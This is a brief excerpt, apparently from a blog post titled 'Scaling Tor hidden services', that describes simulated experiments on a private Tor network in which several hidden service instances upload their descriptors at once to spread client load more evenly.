I therefore ran experiments on a private Tor network using the Shadow network simulator running multiple hidden service instances, and measuring the load distribution over time. The experiments were devised such that the instances uploaded their descriptors simultaneously, which resulted in different hidden service directories receiving different descriptors. As a result, clients connecting to a hidden service would be balanced more uniformly over the available instances.

Continue reading Scaling Tor hidden services